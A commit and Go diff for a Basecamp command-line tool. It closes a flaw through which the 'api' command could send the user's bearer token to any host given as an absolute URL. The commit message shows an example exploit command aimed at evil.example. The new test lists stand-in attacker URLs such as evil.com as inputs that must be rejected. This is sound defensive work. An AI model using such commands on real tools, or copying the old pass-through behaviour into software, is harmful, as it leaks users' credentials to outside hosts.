Reject foreign-host URLs in api command to prevent token leak

parsePath returned absolute URLs verbatim when they lacked a numeric
account-ID segment, so 'basecamp api get https://evil.example/x.json'
sent the bearer token to an arbitrary host via the SDK's Authorization
header. Return an error for absolute http(s):// URLs that aren't the
canonical Basecamp form and propagate it through the get/post/put/delete
handlers. Adds api_test.go coverage for the rejection.

Author: jeremy

internal/commands/api.go

@@ -47,7 +47,10 @@ func newAPIGetCmd() *cobra.Command {
 				return err
 			}
 
-			path := parsePath(args[0])
+			path, err := parsePath(args[0])
+			if err != nil {
+				return err
+			}
 			resp, err := app.Account().Get(cmd.Context(), path)
 			if err != nil {
 				return convertSDKError(err)
@@ -85,7 +88,10 @@ func newAPIPostCmd() *cobra.Command {
 				return err
 			}
 
-			path := parsePath(args[0])
+			path, err := parsePath(args[0])
+			if err != nil {
+				return err
+			}
 
 			// Parse JSON data
 			var body any
@@ -134,7 +140,10 @@ func newAPIPutCmd() *cobra.Command {
 				return err
 			}
 
-			path := parsePath(args[0])
+			path, err := parsePath(args[0])
+			if err != nil {
+				return err
+			}
 
 			// Parse JSON data
 			var body any
@@ -176,7 +185,10 @@ func newAPIDeleteCmd() *cobra.Command {
 				return err
 			}
 
-			path := parsePath(args[0])
+			path, err := parsePath(args[0])
+			if err != nil {
+				return err
+			}
 			resp, err := app.Account().Delete(cmd.Context(), path)
 			if err != nil {
 				return err
@@ -205,16 +217,28 @@ func apiPathArgs(cmd *cobra.Command, args []string) error {
 // Handles full URLs and relative paths. The leading slash is stripped because
 // the SDK's accountPath and buildURL both add one — keeping it here would
 // double-slash and, on Windows, MSYS/Git Bash converts /path to C:\...\path.
-func parsePath(input string) string {
+//
+// Absolute URLs are only accepted in the canonical Basecamp form
+// (https://host/<numeric-account-id>/...); the numeric segment is what proves
+// the URL targets a Basecamp account. Any other absolute URL is rejected so we
+// never attach the bearer token to a request bound for a foreign host.
+func parsePath(input string) (string, error) {
 	urlPattern := regexp.MustCompile(`^https?://[^/]+/[0-9]+(/.*)`)
 	if matches := urlPattern.FindStringSubmatch(input); len(matches) > 1 {
-		return matches[1]
+		return matches[1], nil
+	}
+
+	// Reject absolute URLs that didn't match the numeric-account-ID form.
+	// Returning these verbatim would let the SDK send the Authorization header
+	// to an arbitrary host (credential exfiltration).
+	if strings.HasPrefix(input, "http://") || strings.HasPrefix(input, "https://") {
+		return "", output.ErrUsage("API path must be relative or a Basecamp URL with a numeric account ID; refusing to send credentials to " + input)
 	}
 
 	// Strip leading slash — the SDK prefixes the account path.
 	input = strings.TrimPrefix(input, "/")
 
-	return input
+	return input, nil
 }
 
 // apiSummary generates a summary from the API response.

internal/commands/api_test.go

@@ -23,7 +23,33 @@ func TestParsePath(t *testing.T) {
 
 	for _, tt := range tests {
 		t.Run(tt.input, func(t *testing.T) {
-			assert.Equal(t, tt.want, parsePath(tt.input))
+			got, err := parsePath(tt.input)
+			require.NoError(t, err)
+			assert.Equal(t, tt.want, got)
+		})
+	}
+}
+
+// TestParsePathRejectsForeignHosts guards against bearer-token exfiltration:
+// an absolute URL without a numeric account-ID segment must be rejected before
+// it reaches the SDK, which would otherwise attach the Authorization header and
+// send credentials to the foreign host.
+func TestParsePathRejectsForeignHosts(t *testing.T) {
+	bad := []string{
+		"https://evil.com/projects.json",
+		"http://evil.com/projects.json",
+		"https://evil.com/",
+		"https://evil.com",
+		"https://3.basecampapi.com/projects.json", // no numeric account segment
+		"http://127.0.0.1:9999/projects.json",
+	}
+
+	for _, input := range bad {
+		t.Run(input, func(t *testing.T) {
+			got, err := parsePath(input)
+			require.Error(t, err)
+			assert.Empty(t, got)
+			assert.Contains(t, err.Error(), "refusing to send credentials")
 		})
 	}
 }